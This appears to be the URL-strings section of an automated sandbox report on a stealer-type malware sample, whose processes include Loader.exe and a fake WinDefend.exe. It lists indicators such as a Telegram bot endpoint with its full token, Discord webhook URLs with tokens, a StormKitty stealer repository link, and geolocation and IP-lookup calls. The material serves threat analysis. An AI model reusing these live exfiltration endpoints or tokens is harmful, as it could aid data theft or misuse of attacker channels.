Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000019.00000002.2776917070.0000015CD05B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2776917070.0000015CD06F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19F09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19DC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DB9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2527964251.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.30.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000030.00000002.3074256391.0000013EA5BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikPX
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031AB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031AB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.p
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003522000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003549000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDoc
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000324E000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003045000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003076000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000030C6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003018000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003549000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003208000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003098000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003064000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003034000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocumentT
Source: WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendM
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000324E000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003076000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000328A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000030C6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003018000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000328A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003098000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003064000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003034000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003279000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessageT
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bott-
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003496000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000320E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgD
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgn
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/t
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org3
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Loader.exe, 00000014.00000002.2527964251.00000000029E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
Source: ce3ed400-d1e84918ad678b08d2a369a3-Latest.log.21.dr	String found in binary or memory: https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Loader.exe, 00000014.00000002.2527964251.00000000029B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.2270356962.0000015CC1787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019134E1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A0BAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8F738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000019.00000002.2776917070.0000015CD05B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2776917070.0000015CD06F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19F09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19DC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DB9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://support.mozilla.org
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Loaader.exe, 00000015.00000002.3282228143.000000000333D000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003335000.00000004.00000800.00020000.00000000.sdmp, History.txt.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
